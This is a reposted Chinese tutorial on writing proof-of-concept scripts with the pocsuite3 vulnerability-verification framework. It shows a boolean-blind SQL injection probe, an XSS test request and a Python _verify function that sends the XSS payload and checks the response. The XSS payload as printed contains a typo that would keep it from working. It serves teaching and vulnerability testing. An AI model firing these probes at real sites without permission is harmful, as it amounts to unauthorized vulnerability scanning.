IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> pocsuite傻瓜式写Poc -> 正文阅读

[网络协议]pocsuite傻瓜式写Poc

pocsuite安装及使用

  • pocsuite:一款基于漏洞与poc的远程漏洞验证框架
  • 安装:pip3 install -U pocsuite3 --no-cache-dir
    pocsuite - h检验安装结果
  • 环境:python3.4以上

安装好之后会多出一个命令 pocsuite
在python目录下的_pocsuite_1_1.py就是poc编写的模板,之后要写poc直接复制这个脚本,在里面把参数改一下

  • pocsuite -r 根据模板修改的poc脚本 -f 需要扫描的url文件
    pocsuite扫描结果

自带sql脚本分析

在这里插入图片描述

  • BooleanBindPOC类是吹牛逼用的,就写脚本作者脚本名脚本创建时间这些有的没的
  • 编写验证模式:_verify是我们需要填和修改的地方

target =self.url是-f参数指定的url文本
图中的payload就是?id=1' and left(version(),1)=5 --+

利用pocsuite编写xss poc实例

如果一个网站存在xss,手工注入应该是在参数传入点用<script>alert("ABCDEFG")</script>类型的测试。传参点叫id的话,请求包长这个样子:

GET/1.php?id=%3Csqript%3Ealert(%22ABCDEF%22)%3C/script%3E HTTP/1.1Host: 192.168.97.174
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)Gecko/20100101 Firefox/60.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflateConnection: close
Upgrade-Insecure-Requests: 1

那payload不就是?id=%3Csqript%3Ealert(%22ABCDEF%22)%3C/script%3E
修改的_verify函数如下:

def _verify(self):
	payload="?id=%3Csqript%3Ealert(%22ABCDEF%22)%3C/script%3E"
	result={}
	target=self.url
	req=requests.get(target+payload)
	res=req.text
	if('ABCDEF' in res):
		result['VerifyInfo']={}
		result['VerifyInfo']['URL'] = target
		result['VerifyInfo']['payload'] = payload
		return self.parse_output

一共就改了两个地方,payloadif判断
在这里插入图片描述
xss辣鸡扫描器制作成功
事实上制作绝大部分poc都只需要修改_verify

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-03-04 15:57:23  更:2022-03-04 15:57:32 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 7:44:08-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码